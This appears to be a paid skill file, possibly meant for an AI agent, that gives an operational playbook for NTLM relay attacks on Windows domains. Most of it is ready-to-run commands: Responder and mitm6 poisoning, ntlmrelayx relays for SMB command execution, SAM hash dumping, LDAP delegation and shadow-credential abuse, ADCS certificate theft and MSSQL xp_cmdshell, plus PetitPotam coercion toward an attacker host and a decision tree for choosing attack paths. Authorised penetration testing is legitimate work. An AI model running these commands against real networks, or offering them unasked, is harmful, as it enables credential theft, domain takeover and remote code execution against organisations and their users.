SKILL.md
$27
1. NTLM RELAY FUNDAMENTALS
Victim Attacker (relay) Target
│ │ │
│── NTLM Auth ──→│ │ (1) Victim authenticates (coerced/poisoned)
│ │── Forward Auth ─────→│ (2) Attacker relays to target
│ │←─ Challenge ──────── │ (3) Target sends challenge
│←─ Challenge ────│ │ (4) Attacker forwards challenge to victim
│── Response ────→│ │ (5) Victim computes response
│ │── Forward Response ─→│ (6) Attacker relays response to target
│ │←─ Authenticated! ────│ (7) Target accepts → attacker has sessionNTLMv1 vs NTLMv2
Feature
NTLMv1
NTLMv2
Security
Weak (crackable to NTLM hash)
Stronger (but still relayable)
Relay
Yes
Yes
Crack to hash
Yes (rainbow tables, crack.sh)
Offline brute-force only
Downgrade
Force via Responder --lm
Default in modern Windows
2. RELAY TARGET MATRIX
Target Protocol
What You Get
Signing Required by Default?
EPA/Channel Binding?
SMB
Command exec (if admin), file access
DCs: Yes, Workstations: No
No
LDAP
ACL modification, RBCD, shadow creds, add computer
DCs: No (negotiated)
No (unless configured)
LDAPS
Same as LDAP but encrypted
N/A
Yes (channel binding)
HTTP (ADCS)
Certificate enrollment (ESC8)
No
Depends on config
MSSQL
SQL queries, xp_cmdshell
No
No
IMAP/SMTP
Email access
No
No
RPC
Various (CA enrollment for ESC11)
Depends
No
Signing Check
# Check SMB signing on target
crackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt
# Outputs hosts WITHOUT required SMB signing
# Nmap SMB signing check
nmap -p 445 --script smb2-security-mode TARGET_RANGE3. RESPONDER — CREDENTIAL CAPTURE
LLMNR/NBT-NS/WPAD/mDNS Poisoning
# Start Responder (capture mode — don't relay, just capture hashes)
responder -I eth0 -dwP
# Analyze mode (passive, no poisoning)
responder -I eth0 -A
# Key protocols poisoned:
# LLMNR (UDP 5355) — Link-Local Multicast Name Resolution
# NBT-NS (UDP 137) — NetBIOS Name Service
# WPAD — Web Proxy Auto-Discovery (proxy config)
# mDNS (UDP 5353) — Multicast DNSResponder + Relay (Don't Capture, Relay Instead)
# Disable HTTP and SMB servers in Responder (ntlmrelayx will handle them)
# Edit /etc/responder/Responder.conf: set HTTP and SMB to Off
# Start Responder for poisoning only
responder -I eth0 -dwP
# Start ntlmrelayx for relay
ntlmrelayx.py -tf targets.txt -smb2support4. NTLMRELAYX — RELAY EXECUTION
Relay to SMB (Admin Execution)
# Execute command on targets (requires admin privs on target)
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
# Dump SAM hashes
ntlmrelayx.py -tf targets.txt -smb2support
# Interactive SOCKS proxy (maintain sessions)
ntlmrelayx.py -tf targets.txt -smb2support -socks
# Then: proxychains smbclient //TARGET/C$ -U DOMAIN/userRelay to LDAP (ACL Modification)
# Automatic RBCD (delegate-access)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support
# Escalate via shadow credentials
ntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support
# Add computer account
ntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support
# Dump domain info
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domainRelay to ADCS HTTP (ESC8)
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
--adcs --template DomainController
# Use with coercion to relay DC auth → get DC certificateRelay to MSSQL
ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"5. MITM6 — IPv6 DNS TAKEOVER
# mitm6 exploits IPv6 auto-configuration to become DNS server
mitm6 -d domain.com
# Combined with ntlmrelayx
ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support
# Flow:
# 1. mitm6 sends DHCPv6 replies → victim gets attacker as IPv6 DNS
# 2. Victim queries WPAD → attacker responds
# 3. NTLM auth triggered → relayed to LDAP
# 4. RBCD or shadow credentials set on victim computer6. CROSS-PROTOCOL RELAY
SMB → LDAP
Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).
# Coerce SMB auth from DC, relay to LDAP on same or different DC
ntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support
# Trigger coercion (attacker receives SMB auth)
PetitPotam.py ATTACKER_IP DC01_IPLimitation: SMB → LDAP relay fails if the source uses SMB signing negotiation that indicates relay.
WebDAV → LDAP
WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).
# WebDAV coercion sends HTTP-based NTLM (no SMB signing concern)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support
# Coerce via WebDAV (workstation must have WebClient service running)
# Use @ATTACKER_PORT format to force WebDAV
PetitPotam.py ATTACKER@80/test WORKSTATION_IP7. WEBDAV-BASED COERCION
WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.
# Check if WebClient is running (port 80 listener or service query)
crackmapexec smb TARGET -u user -p pass -M webdav
# Start WebDAV coercion (from workstation, not server)
# Force target to authenticate via HTTP:
# Use UNC path format: \\ATTACKER@PORT\shareKey advantage: HTTP-based NTLM avoids SMB signing requirements.
8. NTLM RELAY DECISION TREE
Want to relay NTLM authentication
│
├── What auth can you capture?
│ ├── Responder poisoning (passive, wait for queries)
│ ├── mitm6 (DHCPv6 DNS takeover, periodic)
│ └── Active coercion → load COERCION_METHODS.md
│
├── What target to relay to?
│ │
│ ├── Need code execution?
│ │ ├── SMB target without signing → ntlmrelayx to SMB (§4)
│ │ └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)
│ │
│ ├── Need domain escalation?
│ │ ├── LDAP signing not enforced?
│ │ │ ├── Relay to LDAP → RBCD (§4)
│ │ │ ├── Relay to LDAP → shadow credentials (§4)
│ │ │ └── Relay to LDAP → add computer + delegate (§4)
│ │ └── LDAP signing enforced?
│ │ └── Relay to ADCS HTTP (ESC8) → certificate (§4)
│ │
│ └── Need certificate?
│ └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)
│
├── Source is SMB-based?
│ ├── Target is SMB → check signing (§2)
│ ├── Target is LDAP → may work (cross-protocol, §6)
│ └── Target is HTTP → works (cross-protocol)
│
├── Source is HTTP-based (WebDAV)?
│ └── Relay to any target (no signing issues, §6/§7)
│
└── Relay fails?
├── Check signing requirements (§2)
├── Check EPA/channel binding
├── Try cross-protocol (SMB → LDAP)
└── Try WebDAV coercion (avoids SMB signing)